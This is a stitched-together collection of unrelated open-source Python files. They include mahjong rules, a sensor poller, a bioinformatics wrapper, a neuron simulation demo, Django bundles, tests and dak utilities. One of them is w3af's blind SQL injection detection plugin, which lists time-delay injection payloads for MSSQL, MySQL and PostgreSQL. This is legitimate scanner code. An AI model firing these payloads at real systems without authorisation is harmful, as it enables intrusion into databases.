        self.mjRules.add(Rule('All pair honors', 'FAllPairHonors', limits=0.5,
                description=m18n('7 pairs of 1s/9s/Winds/Dragons')))
        del self.handRules['Own Flower and Own Season']
        del self.handRules['Three Concealed Pongs']
        self.handRules.add(Rule('Own Flower', 'FOwnFlower', doubles=1))
        self.handRules.add(Rule('Own Season', 'FOwnSeason', doubles=1))
        del self.winnerRules['Last Tile Taken from Dead Wall']
        del self.winnerRules['Hidden Treasure']
        del self.winnerRules['False Color Game']
        del self.winnerRules['Concealed True Color Game']
        del self.winnerRules['East won nine times in a row']
        del self.winnerRules['Last Tile Completes Pair of 2..8']
        del self.winnerRules['Last Tile Completes Pair of Terminals or Honors']
        del self.winnerRules['Last Tile is Only Possible Tile']
        self.winnerRules.add(Rule('Buried Treasure', 'FBuriedTreasure', limits=1,
                description=m18n('Concealed pungs of one suit with winds/dragons and a pair')))
        del self.winnerRules['True Color Game']
        self.winnerRules.add(Rule('Purity', 'FPurity', doubles=3,
                description=m18n('Only same-colored tiles (no chows, dragons or winds)')))
        self.winnerRules['All Greens'].name = m18n('Imperial Jade')
        self.mjRules['Thirteen Orphans'].name = m18n('The 13 Unique Wonders')
        del self.winnerRules['Three Great Scholars']
        self.winnerRules.add(Rule('Three Great Scholars', 'FThreeGreatScholars||Onochow', limits=1,
                description=m18n('3 Pungs or Kongs of dragons plus any pung/kong and a pair')))
        # NOTE(review): DMJL above writes rule.doubles directly; here the
        # nested score object is used -- confirm both reach the same value.
        self.handRules['All Flowers'].score.doubles = 2
        self.handRules['All Seasons'].score.doubles = 2
        self.penaltyRules.add(Rule('False Naming of Discard, Claimed for Chow/Pung/Kong', points = -50))
        self.penaltyRules.add(Rule('False Declaration of Mah Jongg by One Player',
                'Oabsolute payees=3', limits = -0.5))
        self.winnerRules.add(Rule('False Naming of Discard, Claimed for Mah Jongg', 'FFalseDiscardForMJ||Opayforall'))
        # calling-hand bonuses paid to losers who were one tile away:
        self.loserRules.add(Rule('Calling for Only Honors', 'FCallingHand||Ohand=OnlyHonors', limits=0.4))
        self.loserRules.add(Rule('Calling for Wriggling Snake', 'FCallingHand||Ohand=WrigglingSnake', limits=0.4))
        self.loserRules.add(Rule('Calling for Triple Knitting', 'FCallingHand||Ohand=TripleKnitting', limits=0.2))
        self.loserRules.add(Rule('Calling for Gates of Heaven', 'FCallingHand||Ohand=GatesOfHeaven||Opair28',
                limits=0.4))
        self.loserRules.add(Rule('Calling for Knitting', 'FCallingHand||Ohand=Knitting', limits=0.2))
        self.loserRules.add(Rule('Calling for Imperial Jade', 'FCallingHand||Ohand=AllGreen', limits=0.4))
        self.loserRules.add(Rule('Calling for 13 Unique Wonders', 'FCallingHand||Ohand=ThirteenOrphans',
                limits=0.4))
        self.loserRules.add(Rule('Calling for Three Great Scholars', 'FCallingHand||Ohand=ThreeGreatScholars',
                limits=0.4))
        self.loserRules.add(Rule('Calling for All pair honors', 'FCallingHand||Ohand=AllPairHonors', limits=0.2))
        self.loserRules.add(Rule('Calling for Heads and Tails', 'FCallingHand||Ohand=AllTerminals', limits=0.4))
        self.loserRules.add(Rule('Calling for Four Blessings Hovering over the Door',
                'FCallingHand||Ohand=FourBlessingsHoveringOverTheDoor', limits=0.4))
        self.loserRules.add(Rule('Calling for Buried Treasure', 'FCallingHand||Ohand=BuriedTreasure', limits=0.4))
        self.loserRules.add(Rule('Calling for Fourfold Plenty', 'FCallingHand||Ohand=FourfoldPlenty', limits=0.4))
        # NOTE(review): this one uses doubles=3 instead of limits -- confirm it
        # is intentional and not a copy/paste slip.
        self.loserRules.add(Rule('Calling for Purity', 'FCallingHand||Ohand=Purity', doubles=3))
def loadPredefinedRulesets():
    """Register all predefined ruleset classes exactly once.

    Add new predefined rulesets here; registration is skipped when the
    class registry has already been populated.
    """
    if PredefinedRuleset.classes:
        return
    for rulesetClass in (ClassicalChineseDMJL, ClassicalChineseBMJA):
        PredefinedRuleset.classes.add(rulesetClass)
| jsj2008/kdegames | kajongg/src/predefined.py | Python | gpl-2.0 | 21,844 |
#!/usr/bin/env python
""" Poll sensor data log file
Poll the sensor data log file periodically and use parse_log to submit new
values via http.
"""
import time
from subprocess import call
LOG_FILE = 'aginovadb.log'      # sensor data log file to poll
PARSER = 'parse_log.py'         # script that submits new values via http
POLL_INTERVAL = 120             # in seconds
def main():
    """Periodically run the log parser, forever."""
    while True:
        # time.time() is already seconds since the Unix epoch (UTC).  The
        # previous int(time.mktime(time.gmtime())) fed a UTC struct_time to
        # mktime(), which expects *local* time, skewing the stamp by the
        # machine's UTC offset.
        epoch = int(time.time())
        # parenthesised single-argument print works under Python 2 and 3
        print("polling '%s': %s" % (LOG_FILE, epoch))
        call(['python', PARSER, LOG_FILE, str(epoch)])
        time.sleep(POLL_INTERVAL)
if __name__ == '__main__':
    main()
| smart-cities/reading_aginova_sensors | scripts/poll.py | Python | gpl-2.0 | 580 |
'''
blind_sqli_time_delay.py
Copyright 2008 Andres Riancho
This file is part of w3af, w3af.sourceforge.net .
w3af is free software; you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation version 2 of the License.
w3af is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with w3af; if not, write to the Free Software
Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA
'''
from fuzzer import createMutants, createRandNum
import outputManager as om
import vuln as vuln
import knowledgeBase as kb
import severity as severity
import dbms as dbms
from w3afException import w3afException
# importing this to have sendMutant and setUrlOpener
from basePlugin import basePlugin
class blind_sqli_time_delay(basePlugin):
    '''
    This class tests for blind SQL injection bugs using time delays,
    the logic is here and not as an audit plugin because this logic is also used in attack plugins.
    @author: Andres Riancho ( andres.riancho@gmail.com )
    '''
    def __init__(self, crawler):
        # ""I'm a plugin""
        basePlugin.__init__(self, crawler)
        # The wait time of the first test I'm going to perform
        self._wait_time = 5
        # The original delay between request and response
        # NOTE(review): this is a plain local, not self._original_wait_time,
        # so the assignment has no lasting effect; harmless because
        # is_injectable() measures its own baseline, but confirm the intent.
        _original_wait_time = 0
    def is_injectable( self, freq, parameter ):
        '''
        Check if "parameter" of the fuzzable request object is injectable or not.
        @freq: The fuzzableRequest object that I have to modify
        @parameter: A string with the parameter name to test
        @return: A vulnerability object or None if nothing is found
        '''
        # First save the original wait time
        _original_wait_time = self._sendMutant( freq, analyze=False ).getWaitTime()
        # Create the mutants
        parameter_to_test = [ parameter, ]
        statement_list = self._get_statements()
        sql_commands_only = [ i.sql_command for i in statement_list ]
        mutants = createMutants( freq , sql_commands_only, fuzzableParamList=parameter_to_test )
        # And now I assign the statement to the mutant
        # (match each payload string back to the statement object so the
        # mutant knows which DBMS it targets)
        for statement in statement_list:
            for mutant in mutants:
                if statement.sql_command in mutant.getModValue():
                    mutant.statement = statement.sql_command
                    mutant.dbms = statement.dbms
        # Perform the test
        for mutant in mutants:
            # Send
            response = self._sendMutant( mutant, analyze=False )
            # Compare times
            # The "-2" grants a two second tolerance; see the BENCHMARK
            # discussion in _get_statements() for why the delay may be short.
            if response.getWaitTime() > (_original_wait_time + self._wait_time-2):
                # Resend the same request to verify that this wasn't because of network delay
                # or some other rare thing
                _original_wait_time = self._sendMutant( freq, analyze=False ).getWaitTime()
                response = self._sendMutant( mutant, analyze=False )
                # Compare times (once again)
                if response.getWaitTime() > (_original_wait_time + self._wait_time-2):
                    # Now I can be sure that I found a vuln, I control the time of the response.
                    v = vuln.vuln( mutant )
                    v.setName( 'Blind SQL injection - ' + mutant.dbms )
                    v.setSeverity(severity.HIGH)
                    v.setDesc( 'Blind SQL injection was found at: ' + mutant.foundAt() )
                    v.setDc( mutant.getDc() )
                    v.setId( response.id )
                    v.setURI( response.getURI() )
                    return v
        return None
    def _get_statements( self ):
        '''
        @return: A list of statements that are going to be used to test for
        blind SQL injections. The statements are objects.
        '''
        res = []
        # MSSQL
        # One variant per quoting/parenthesis context the parameter may sit in.
        res.append( statement("1;waitfor delay '0:0:"+str(self._wait_time)+"'--", dbms.MSSQL) )
        res.append( statement("1);waitfor delay '0:0:"+str(self._wait_time)+"'--", dbms.MSSQL) )
        res.append( statement("1));waitfor delay '0:0:"+str(self._wait_time)+"'--", dbms.MSSQL) )
        res.append( statement("1';waitfor delay '0:0:"+str(self._wait_time)+"'--", dbms.MSSQL) )
        res.append( statement("1');waitfor delay '0:0:"+str(self._wait_time)+"'--", dbms.MSSQL) )
        res.append( statement("1'));waitfor delay '0:0:"+str(self._wait_time)+"'--", dbms.MSSQL) )
        # MySQL
        # =====
        # MySQL doesn't have a sleep function, so I have to use BENCHMARK(1000000000,MD5(1))
        # but the benchmarking will delay the response a different amount of time in each computer
        # which sucks because I use the time delay to check!
        #
        # In my test environment 3500000 delays 10 seconds
        # This is why I selected 2500000 which is guaranteeded to (at least) delay 8
        # seconds; and I only check the delay like this:
        # response.getWaitTime() > (_original_wait_time + self._wait_time-2):
        #
        # With a small wait time of 5 seconds, this should work without problems...
        # and without hitting the xUrllib timeout !
        res.append( statement("1 or BENCHMARK(2500000,MD5(1))", dbms.MYSQL) )
        res.append( statement("1' or BENCHMARK(2500000,MD5(1)) or '1'='1", dbms.MYSQL) )
        res.append( statement('1" or BENCHMARK(2500000,MD5(1)) or "1"="1', dbms.MYSQL) )
        # PostgreSQL
        res.append( statement("1 or pg_sleep("+ str(self._wait_time) +")", dbms.POSTGRE) )
        res.append( statement("1' or pg_sleep("+ str(self._wait_time) +") or '1'='1", dbms.POSTGRE) )
        res.append( statement('1" or pg_sleep('+ str(self._wait_time) +') or "1"="1', dbms.POSTGRE) )
        # TODO: Add Oracle support
        # TODO: Add XXXXX support
        return res
class statement(object):
    """Pair a time-delay SQL payload with the DBMS it targets.

    Plain value object: is_injectable() reads both attributes to tag the
    mutants it sends.
    """
    def __init__(self, sql_command, dbms):
        # keep the raw payload and its target database side by side
        self.dbms = dbms
        self.sql_command = sql_command
| adamdoupe/enemy-of-the-state | audit/blind_sqli_time_delay.py | Python | gpl-2.0 | 6,458 |
# -*- encoding: utf-8 -*-
import sys
import os
import os.path
import glob
import logging
from utils import *
def _run_is_paired( run, spot_type, paired_samples ):
    """Decide whether <run> must be aligned as paired-end reads.

    spot_type is the experiment-wide layout: "paired" (all runs paired),
    "single" (all single-end) or "mixed" (paired only for the runs listed
    in paired_samples)."""
    if spot_type == "paired":
        return True
    if spot_type == "single":
        return False
    if spot_type == "mixed":
        return run in paired_samples
    # the original silently fell through and later crashed with a NameError
    # on an undefined command; fail with a clear message instead
    raise ValueError( "unknown SPOT_TYPE: %s" % spot_type )

def _output_dir( configs, run, suffix ):
    """Build the per-run, per-index output directory for the aligner."""
    return configs['SPLICED_ALIGNER_PATH'] + "/" + run + "_%s_ebwt%s" % \
        ( os.path.basename( configs['SPLICED_ALIGNER'] ), suffix )

def _aligner_command( configs, suffix, out_dir, trimmed_files, paired ):
    """Assemble the spliced-aligner (e.g. tophat) command line.

    suffix selects the annotation/index pair (GTF_PATH<suffix>,
    EBWT_PATH<suffix>); for paired runs the mate file is appended."""
    cmd = "%s %s --output-dir %s --num-threads %s --GTF %s %s %s" % ( \
        configs['SPLICED_ALIGNER'], \
        configs['SPLICED_ALIGNER_PARAMS'], \
        out_dir, \
        configs['SPLICED_ALIGNER_THREADS'], \
        configs['GTF_PATH' + suffix], \
        configs['EBWT_PATH' + suffix], \
        trimmed_files[0] )
    if paired:
        cmd += " " + trimmed_files[1]
    return cmd

def splice_mapping( T, configs, audit ):
    """Run splice-aware mapping for every run in T.

    For each run the rRNA-depleted fastq files are located and one aligner
    invocation is issued per sample-mapping option configured for that run.
    When audit is true the commands are only logged, not executed.
    (The previous version repeated the command-building logic four times;
    it is now factored into _aligner_command with identical output.)"""
    logging.debug( "Splice mapping..." )
    # create the destination for splice alignments if not exists
    try:
        os.mkdir( configs['SPLICED_ALIGNER_PATH'] )
    except OSError:
        logging.warn( "%s directory already exists. Proceeding..." % \
            configs['SPLICED_ALIGNER_PATH'] )
    # .items() behaves like the old .iteritems() here and also works on Python 3
    for run, R in T.runs.items():
        trimmed_files = glob.glob( configs['RRNA_MINUS_PATH'] + "/" + R.run + \
            "*.fastq" )
        paired = _run_is_paired( R.run, configs['SPOT_TYPE'], \
            configs['PAIRED_SAMPLES'].split( "," ) )
        if paired:
            # mate files must be passed to the aligner in sorted (R1, R2) order
            trimmed_files.sort()
        # one mapping per sample-mapping option (bowtie index suffix)
        for s in configs[R.run].split( "," ):
            out_dir = _output_dir( configs, R.run, s )
            try:
                os.mkdir( out_dir )
            except OSError:
                logging.warn( "%s directory already exists. Proceeding..." % out_dir )
            sa_cmd = _aligner_command( configs, s, out_dir, trimmed_files, paired )
            logging.debug( sa_cmd )
            if not audit:
                run_command( sa_cmd )
| polarise/breeze | breeze/splice_mapping.py | Python | gpl-2.0 | 3,421 |
def _next_permutation(digits):
    """Return the lexicographically next arrangement of the digit string
    *digits*, using each digit exactly once.

    Raises:
        ValueError: when the digits are already in non-increasing order,
            i.e. no larger arrangement exists.
    """
    if len(digits) == 1:
        # A single digit cannot be rearranged into anything larger.
        raise ValueError("no larger arrangement of %r" % digits)
    head, tail = digits[0], digits[1:]
    try:
        # If the suffix can still grow, growing it is the smallest increase.
        return head + _next_permutation(tail)
    except ValueError:
        # Suffix is maxed out: promote the smallest suffix digit that beats
        # the head.  min() itself raises ValueError on an empty sequence,
        # which propagates upward as "no larger arrangement".
        new_head = min(c for c in tail if c > head)
        # Remove only ONE occurrence of the promoted digit; the original
        # filtered out *all* copies, silently dropping digits from inputs
        # with repeats (e.g. 155 -> 51 instead of 515).
        rest = list(digits)
        rest.remove(new_head)
        return new_head + "".join(sorted(rest))


def find_number(x):
    """Return the smallest integer larger than the non-negative integer *x*
    that is written with exactly the same digits.

    Raises:
        ValueError: if no such number exists (x has a single digit, or its
            digits are already in descending order, e.g. 21 or 974310).
    """
    # Working on the digit string end to end fixes the old int() round-trip,
    # which stripped leading zeros from suffixes (find_number(1023) lost a
    # digit and returned 132 instead of 1032).
    return int(_next_permutation(str(x)))
print(find_number(5346)) | danithaca/berrypicking | python/excercise/march31.py | Python | gpl-2.0 | 644 |
"""
Computes and stores a lookup table for a given environment and reward function.
A list of reward functions will be added here and refered to by the keyword "rType".
"""
class Reward:
def __init__(self,environment,rType):
def exampleReward(self,environment):
return | ProjectALTAIR/Simulation | mdp/reward.py | Python | gpl-2.0 | 288 |
import numpy as np
# Set the random seed for reproducibility
# Draw a fresh 16-bit seed, report it so a run can be reproduced exactly,
# then seed numpy's global RNG with it.
seed = np.random.randint(2**16)
print "Seed: ", seed
np.random.seed(seed)
import matplotlib.pyplot as plt
from matplotlib.patches import Polygon
from optofit.cneuron.compartment import Compartment, SquidCompartment
from optofit.cneuron.channels import LeakChannel, NaChannel, KdrChannel
from optofit.cneuron.simulate import forward_euler
from hips.inference.particle_mcmc import *
from optofit.cinference.pmcmc import *
# Make a simple compartment
# Classic Hodgkin-Huxley squid-axon parameters (leak, Na, and
# delayed-rectifier K channels).  NOTE(review): units are presumably the
# standard HH ones (C in uF/cm^2, conductances in mS/cm^2, potentials in
# mV) -- confirm against the optofit compartment implementation.
hypers = {
            'C'      : 1.0,     # membrane capacitance
            'V0'     : -60.0,   # initial membrane potential
            'g_leak' : 0.3,     # leak conductance
            'E_leak' : -65.0,   # leak reversal potential
            'g_na'   : 120.0,   # peak sodium conductance
            'E_na'   : 50.0,    # sodium reversal potential
            'g_kdr'  : 36.0,    # delayed-rectifier potassium conductance
            'E_kdr'  : -77.0    # potassium reversal potential
         }
def sample_model():
    """Simulate the squid compartment model and sample noisy observations.

    Builds a SquidCompartment with the module-level ``hypers``, drives it
    with an injected current pulse plus white noise, samples one latent
    trajectory under the Hodgkin-Huxley proposal, and draws voltage-only
    observations from it.  Plots the trajectory and returns
    (t, z, x, init, prop, lkhd) for use by the inference routine.
    """
    # # Add a few channels
    # body = Compartment(name='body', hypers=hypers)
    # leak = LeakChannel(name='leak', hypers=hypers)
    # na = NaChannel(name='na', hypers=hypers)
    # kdr = KdrChannel(name='kdr', hypers=hypers)
    #
    # body.add_child(leak)
    # body.add_child(na)
    # body.add_child(kdr)
    # Initialize the model
    # body.initialize_offsets()

    squid_body = SquidCompartment(name='body', hypers=hypers)

    # Initialize the model
    D, I = squid_body.initialize_offsets()

    # Set the recording duration
    t_start = 0
    t_stop = 100.
    dt = 0.01
    t = np.arange(t_start, t_stop, dt)
    T = len(t)

    # Make input with an injected current from 500-600ms
    # NOTE(review): with dt=0.01 these indices cover t=50..60, not 500-600ms
    # as the comment above says -- confirm which was intended.  Also note the
    # slice bounds are floats (50/dt); newer numpy releases reject
    # float indices, so this relies on an older numpy.
    inpt = np.zeros((T, I))
    inpt[50/dt:60/dt,:] = 7.
    inpt += np.random.randn(T, I)

    # Set the initial distribution to be Gaussian around the steady state
    z0 = np.zeros(D)
    squid_body.steady_state(z0)
    init = GaussianInitialDistribution(z0, 0.1**2 * np.eye(D))

    # Set the proposal distribution using Hodgkin Huxley dynamics
    # TODO: Fix the hack which requires us to know the number of particles
    N = 100
    sigmas = 0.0001*np.ones(D)
    # Set the voltage transition dynamics to be a bit noisier
    sigmas[squid_body.x_offset] = 0.25
    prop = HodgkinHuxleyProposal(T, N, D, squid_body, sigmas, t, inpt)

    # Set the observation model to observe only the voltage
    etas = np.ones(1)
    observed_dims = np.array([squid_body.x_offset]).astype(np.int32)
    lkhd = PartialGaussianLikelihood(observed_dims, etas)

    # Initialize the latent state matrix to sample N=1 particle
    z = np.zeros((T,N,D))
    z[0,0,:] = init.sample()
    # Initialize the output matrix
    x = np.zeros((T,D))

    # Sample the latent state sequence
    for i in np.arange(0,T-1):
        # The interface kinda sucks. We have to tell it that
        # the first particle is always its ancestor
        prop.sample_next(z, i, np.array([0], dtype=np.int32))

    # Sample observations
    for i in np.arange(0,T):
        lkhd.sample(z,x,i,0)

    # Extract the first (and in this case only) particle
    z = z[:,0,:].copy(order='C')

    # Plot the first particle trajectory
    plt.ion()
    fig = plt.figure()
    # fig.add_subplot(111, aspect='equal')
    plt.plot(t, z[:,observed_dims[0]], 'k')
    plt.plot(t, x[:,0], 'r')
    plt.show()
    plt.pause(0.01)

    return t, z, x, init, prop, lkhd
# Now run the pMCMC inference
def sample_z_given_x(t, z_curr, x,
                     init, prop, lkhd,
                     N_particles=100,
                     plot=False):
    """Run S=100 particle-Gibbs (ancestor sampling) sweeps of z given x.

    Returns the (S, T, D) array of latent-state samples; when *plot* is set,
    overlays the posterior mean +/- one std dev envelope on the current
    figure.
    """
    T,D = z_curr.shape
    T,O = x.shape
    # import pdb; pdb.set_trace()
    pf = ParticleGibbsAncestorSampling(T, N_particles, D)
    pf.initialize(init, prop, lkhd, x, z_curr)

    S = 100
    z_smpls = np.zeros((S,T,D))
    l = plt.plot(t, z_smpls[0,:,0], 'b')
    for s in range(S):
        print "Iteration %d" % s
        # Reinitialize with the previous particle
        # NOTE(review): z_smpls[s] has not been filled yet at this point, so
        # every sweep conditions on the all-zeros trajectory rather than the
        # previous sample (z_smpls[s-1]) or z_curr -- this looks like a bug;
        # confirm against ParticleGibbsAncestorSampling's intended usage.
        pf.initialize(init, prop, lkhd, x, z_smpls[s,:,:])
        z_smpls[s,:,:] = pf.sample()
        l[0].set_data(t, z_smpls[s,:,0])
        plt.pause(0.01)

    # Posterior mean/std over sweeps; the envelope polygon traces mean+std
    # left-to-right then mean-std right-to-left.
    z_mean = z_smpls.mean(axis=0)
    z_std = z_smpls.std(axis=0)
    z_env = np.zeros((T*2,2))
    z_env[:,0] = np.concatenate((t, t[::-1]))
    z_env[:,1] = np.concatenate((z_mean[:,0] + z_std[:,0], z_mean[::-1,0] - z_std[::-1,0]))

    if plot:
        plt.gca().add_patch(Polygon(z_env, facecolor='b', alpha=0.25, edgecolor='none'))
        plt.plot(t, z_mean[:,0], 'b', lw=1)
        # Plot a few random samples
        # for s in range(10):
        #     si = np.random.randint(S)
        #     plt.plot(t, z_smpls[si,:,0], '-b', lw=0.5)
        plt.ioff()
        plt.show()

    return z_smpls
# Script entry point: simulate synthetic data from the model, then (next
# line) run particle-Gibbs smoothing conditioned on the simulated data.
t, z, x, init, prop, lkhd = sample_model()
sample_z_given_x(t, z, x, init, prop, lkhd, plot=True) | HIPS/optofit | examples/cython_demo.py | Python | gpl-2.0 | 4,626 |
# -*- coding: utf-8 -*-
#
# This file is part of Invenio.
# Copyright (C) 2016, 2017 CERN.
#
# Invenio is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License as
# published by the Free Software Foundation; either version 2 of the
# License, or (at your option) any later version.
#
# Invenio is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Invenio; if not, write to the Free Software Foundation, Inc.,
# 59 Temple Place, Suite 330, Boston, MA 02111-1307, USA.
"""JS/CSS bundles for Records."""
from __future__ import absolute_import, print_function
from flask_assets import Bundle
from invenio_assets import NpmBundle
# Statistics page JavaScript: the invenio-charts-js library plus the local
# stats glue script, with its npm dependency pinned here.
stats_js = NpmBundle(
    "node_modules/invenio-charts-js/dist/lib.bundle.js",
    "js/cds_records/stats.js",
    output="gen/cds.records.stats.%(version)s.js",
    npm={
        "invenio-charts-js": "^0.2.2",
    },
)

# Statistics page styles: chart SCSS compiled via node-scss and URL-cleaned.
stats_css = Bundle(
    Bundle(
        "node_modules/invenio-charts-js/src/styles/styles.scss",
        "scss/stats.scss",
        filters="node-scss,cleancssurl",
    ),
    output="gen/cds.stats.%(version)s.css",
)

# Main record-detail page bundle: CDS angular app plus supporting angular
# modules, minified; rebuilt whenever anything under node_modules/cds/dist
# changes.  npm versions for all required packages are declared inline.
js = NpmBundle(
    Bundle(
        "node_modules/cds/dist/cds.js",
        "node_modules/angular-sanitize/angular-sanitize.js",
        "node_modules/angular-strap/dist/angular-strap.js",
        "node_modules/invenio-files-js/dist/invenio-files-js.js",
        "node_modules/ngmodal/dist/ng-modal.js",
        "js/cds_records/main.js",
        "js/cds_records/user_actions_logger.js",
        filters="jsmin",
    ),
    depends=("node_modules/cds/dist/*.js",),
    filters="jsmin",
    output="gen/cds.record.%(version)s.js",
    npm={
        "angular": "~1.4.10",
        "angular-sanitize": "~1.4.10",
        "angular-loading-bar": "~0.9.0",
        "cds": "~0.2.0",
        "ng-dialog": "~0.6.0",
        "ngmodal": "~2.0.1",
    },
)
| CERNDocumentServer/cds-videos | cds/modules/records/bundles.py | Python | gpl-2.0 | 2,122 |
# encoding: utf-8
'''
Tests for various attachment thingies
Created on Oct 21, 2013
@author: pupssman
'''
import pytest
from hamcrest import has_entries, assert_that, is_, contains, has_property
from allure.constants import AttachmentType
from allure.utils import all_of
@pytest.mark.parametrize('package', ['pytest.allure', 'allure'])
def test_smoke(report_for, package):
    """Attaching via either entry point (pytest.allure or allure) must yield
    an <attachment> element titled 'Foo' in the generated report."""
    report = report_for("""
    import pytest
    import allure

    def test_x():
        %s.attach('Foo', 'Bar')
    """ % package)

    assert_that(report.findall('test-cases/test-case/attachments/attachment'), contains(has_property('attrib', has_entries(title='Foo'))))
@pytest.mark.parametrize('a_type', map(lambda x: x[0], all_of(AttachmentType)))
def test_attach_types(report_for, a_type):
    """Each declared AttachmentType must be recorded in the report with its
    corresponding MIME type."""
    report = report_for("""
    import allure as A

    def test_x():
        A.attach('Foo', 'Bar', A.attach_type.%s)
    """ % a_type)

    assert_that(report.find('.//attachment').attrib, has_entries(title='Foo', type=getattr(AttachmentType, a_type).mime_type))
class TestContents:
    """Checks that attachment payloads are written to disk byte-accurately
    for ASCII, unicode and non-UTF-8 byte strings."""

    @pytest.fixture
    def attach_contents(self, report_for, reportdir):
        """
        Fixture that returns contents of the attachment file for given attach body
        """
        def impl(body):
            # Run a one-test session that attaches `body`, then read back the
            # attachment file referenced by the report's `source` attribute.
            report = report_for("""
            from pytest import allure as A

            def test_x():
                A.attach('Foo', %s, A.attach_type.TEXT)
            """ % repr(body))

            filename = report.find('.//attachment').get('source')
            return reportdir.join(filename).read('rb')

        return impl

    def test_ascii(self, attach_contents):
        assert_that(attach_contents('foo\nbar\tbaz'), is_(b'foo\nbar\tbaz'))

    def test_unicode(self, attach_contents):
        # Unicode text should round-trip through a UTF-8 encoded file.
        assert_that(attach_contents(u'ололо пыщьпыщь').decode('utf-8'), is_(u'ололо пыщьпыщь'))

    def test_broken_unicode(self, attach_contents):
        # Already-encoded (non-UTF-8) byte strings must be stored verbatim.
        assert_that(attach_contents(u'ололо пыщьпыщь'.encode('cp1251')), is_(u'ололо пыщьпыщь'.encode('cp1251')))
def test_attach_in_fixture_teardown(report_for):
    """
    Check that calling ``pytest.allure.attach`` in fixture teardown works and attaches it there.
    """
    report = report_for("""
    import pytest

    @pytest.yield_fixture(scope='function')
    def myfix():
        yield
        pytest.allure.attach('Foo', 'Bar')

    def test_x(myfix):
        assert True
    """)

    # The teardown-time attachment must still land in the report.
    assert_that(report.find('.//attachment').attrib, has_entries(title='Foo'))
| pvarenik/PyCourses | allure-python-master/tests/test_attach.py | Python | gpl-2.0 | 2,550 |
# -*- coding: utf-8 -*-
# Generated by Django 1.10.4 on 2017-09-21 00:22
from __future__ import unicode_literals
from django.db import migrations, models
import themes.models
class Migration(migrations.Migration):
    # Auto-generated Django migration: adds an optional high-contrast logo
    # ImageField to the Themes model.  The field name 'high_contrats_logo'
    # contains a typo, but it is kept as-is because renaming an applied
    # migration's column requires a new migration, not an edit here.

    dependencies = [
        ('themes', '0006_auto_20170610_1512'),
    ]

    operations = [
        migrations.AddField(
            model_name='themes',
            name='high_contrats_logo',
            field=models.ImageField(blank=True, null=True, upload_to='themes/', validators=[themes.models.validate_img_extension], verbose_name='High Contrast Logo'),
        ),
    ]
| amadeusproject/amadeuslms | themes/migrations/0007_themes_high_contrats_logo.py | Python | gpl-2.0 | 597 |
#!/usr/bin/env python
# vim:set et ts=4 sw=4:
"""Utility functions
@contact: Debian FTP Master <ftpmaster@debian.org>
@copyright: 2000, 2001, 2002, 2003, 2004, 2005, 2006 James Troup <james@nocrew.org>
@license: GNU General Public License version 2 or later
"""
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA
import commands
import email.Header
import os
import pwd
import select
import socket
import shutil
import sys
import tempfile
import traceback
import stat
import apt_inst
import apt_pkg
import time
import re
import email as modemail
import subprocess
from dbconn import DBConn, get_architecture, get_component, get_suite, \
get_override_type, Keyring, session_wrapper, \
get_active_keyring_paths, get_primary_keyring_path
from sqlalchemy import desc
from dak_exceptions import *
from gpg import SignedFile
from textutils import fix_maintainer
from regexes import re_html_escaping, html_escaping, re_single_line_field, \
re_multi_line_field, re_srchasver, re_taint_free, \
re_gpg_uid, re_re_mark, re_whitespace_comment, re_issource, \
re_is_orig_source
from formats import parse_format, validate_changes_format
from srcformats import get_format_from_string
from collections import defaultdict
################################################################################
# Module-level defaults and caches shared by the helpers below.
default_config = "/etc/dak/dak.conf"     #: default dak config, defines host properties
default_apt_config = "/etc/dak/apt.conf" #: default apt config, not normally used

alias_cache = None        #: Cache for email alias checks
key_uid_email_cache = {}  #: Cache for email addresses from gpg key uids

# (hashname, function, earliest_changes_version)
known_hashes = [("sha1", apt_pkg.sha1sum, (1, 8)),
                ("sha256", apt_pkg.sha256sum, (1, 8))] #: hashes we accept for entries in .changes/.dsc
# Monkeypatch commands.getstatusoutput as it may not return the correct exit
# code in lenny's Python. This also affects commands.getoutput and
# commands.getstatus.
def dak_getstatusoutput(cmd):
    """Drop-in replacement for commands.getstatusoutput().

    Runs *cmd* through the shell with stderr merged into stdout.  Returns
    (exitcode, output) with a single trailing newline stripped, mapping a
    still-unknown return code to 0.  Exists because lenny's Python could
    return the wrong exit code from commands.getstatusoutput().

    Fix: the child used to be reaped twice (pipe.wait() called twice, the
    first result thrown away); reap it exactly once.
    """
    pipe = subprocess.Popen(cmd, shell=True, universal_newlines=True,
        stdout=subprocess.PIPE, stderr=subprocess.STDOUT)

    output = pipe.stdout.read()

    # Single wait(): reads are already complete, so this just reaps the
    # child and yields its exit status.
    ret = pipe.wait()

    if output[-1:] == '\n':
        output = output[:-1]

    if ret is None:
        ret = 0

    return ret, output
commands.getstatusoutput = dak_getstatusoutput
################################################################################
def html_escape(s):
    """Escape HTML-special characters in *s* via the html_escaping table."""
    def _replace(match):
        return html_escaping.get(match.group(0))
    return re_html_escaping.sub(_replace, s)
################################################################################
def open_file(filename, mode='r'):
    """
    Open C{filename} and return the file object.

    @type filename: string
    @param filename: path/filename to open

    @type mode: string
    @param mode: open mode

    @rtype: fileobject
    @return: open fileobject

    @raise CantOpenError: raised in place of IOError so callers get a
    dak-specific exception carrying the offending path.
    """
    try:
        return open(filename, mode)
    except IOError:
        raise CantOpenError(filename)
################################################################################
def our_raw_input(prompt=""):
if prompt:
while 1:
try:
sys.stdout.write(prompt)
break
except IOError:
pass
sys.stdout.flush()
try:
ret = raw_input()
return ret
except EOFError:
sys.stderr.write("\nUser interrupt (^D).\n")
raise SystemExit
################################################################################
def extract_component_from_section(section, session=None):
    """Split the archive component out of a section string.
